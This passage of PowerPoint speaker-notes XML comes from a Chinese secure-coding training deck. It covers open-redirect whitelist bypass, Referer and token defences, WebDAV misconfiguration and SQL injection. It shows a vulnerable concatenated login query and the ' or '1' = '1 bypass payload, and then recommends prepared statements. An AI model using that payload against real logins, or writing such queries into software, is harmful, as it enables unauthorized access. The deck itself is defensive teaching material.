              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将直接允许通过并且显示会可信的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，而一旦该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里包含一些跳转漏洞将可能导致安全限制被绕过。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果引用一些资源的限制是依赖于“白名单方式”，同样可能被绕过导致安全风险，譬如常见的一些应用允许引入可信站点如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>youku.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的视频，限制方式往往是检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>youku.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来实现，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>youku.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内含一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转漏洞，将导致最终引入的资源属于不可信的第三方资源或者恶意站点，最终导致安全问题。</a:t>
            </a:r>
          </a:p>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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4187061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理论上讲，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的一种，我们需要对传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>做有效性的认证，保证该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来自于正确的地方，限制的方式同防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一样可以包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的限制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果确定传递</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数进入的来源，我们可以通过该方式实现安全限制，保证该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的有效性，避免恶意用户自己生成跳转链接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加入有效性验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们保证所有生成的链接都是来自于我们可信域的，通过在生成的链接里加入用户不可控的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对生成的链接进行校验，可以避免用户生成自己的恶意链接从而被利用，但是如果功能本身要求比较开放，可能导致有一定的限制。</a:t>
            </a:r>
          </a:p>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9902289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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>配置不正确可能允许远程用户操作网站内容，造成页面篡改、文件上传、恶意删除、网页挂马等严重危害。</a:t>
            </a:r>
          </a:p>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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22188215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01C7B5F-6A46-7341-9207-C3D7F3B3484A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1319799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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2151615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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186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6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BC5203-3B81-4CA1-A3DB-6F105B641DB3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224681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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188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8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47F3A0-EBC8-462A-BBD3-1B2120472BD6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243021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D446B6-EAC4-4607-89DB-0623D206FF90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20172924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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189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94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3E38ED-D6A4-4CE5-8CDE-BD15393F5E02}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2843533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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190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即使到目前为止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>仍有一些人连基本的恶义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语法都不知道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = "select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tb_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where name= '"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>varname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+"' and passwd='"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>varpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+"'";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果我们把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[' or '1' = '1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>varpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传入进来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户名随意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>看看会成为什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tb_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' and passwd = '' or '1' = '1';</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'1'='1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>肯定成立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所以可以任何通过验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果你使用预编译语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你传入的任何内容就不会和原来的语句发生任何匹配的关系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只要全使用预编译语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你就用不着对传入的数据做任何过虑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而如果使用普通的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>statement,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有可能要对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>drop,;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等做费尽心机的判断和过虑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190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42A87D-86C4-4A39-B5BF-9AF72518479A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1700091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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191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1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9F9C5D-C013-4635-9B6F-26CF8EBAAD6D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1995907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4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81142D-A01A-4E9E-B279-9FD3A6FFCF3C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4703757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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193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3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DAD82B-1C03-47CE-A21E-F0DB20D823F3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37340571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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194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10CE22-8AD0-44EE-87FA-7C23A4225DE3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16651288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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1955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55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CF116F-2547-44F9-A6D5-739D74893EA7}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3784934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 一开始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> 就在开发的需求设计环节考虑到 安全设计 或 安全编码问题，以上问题可以大大减少 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D446B6-EAC4-4607-89DB-0623D206FF90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982879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网络安全法关于应用安全的要求？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>金融行业需要更加有适用性的软件安全开发生命周期</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D446B6-EAC4-4607-89DB-0623D206FF90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="776960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网络安全法关于应用安全的要求？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>金融行业需要更加有适用性的软件安全开发生命周期</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D446B6-EAC4-4607-89DB-0623D206FF90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3620158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数据库安全问题：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://www.51testing.com/html/93/n-814393-2.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5E909DA3-518A-49E1-AD2D-04224FB8771A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4291584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PPT封面.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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CE9A1C-7E7A-334D-AB22-41E70D1CDF2E}"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19BCF0B1-D809-1B4E-B950-D7D537E3F90C}"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044A7734-F354-BF40-A518-AD529B72E9B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2E6917E-99C2-8B43-B7FF-98CCEA0DBF45}"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A5B5990-B8C6-C540-BE4E-1DB5ECF6BE91}"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32EB274-D9D3-1A4C-8A5F-788525C6A7DF}"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59832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598328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E31410F-0EF2-0B47-BFEA-5DB3634E1812}"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046912" y="6520259"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{927F4F19-5315-494A-A7FB-593C7D52536E}"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7" descr="PPT封底.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
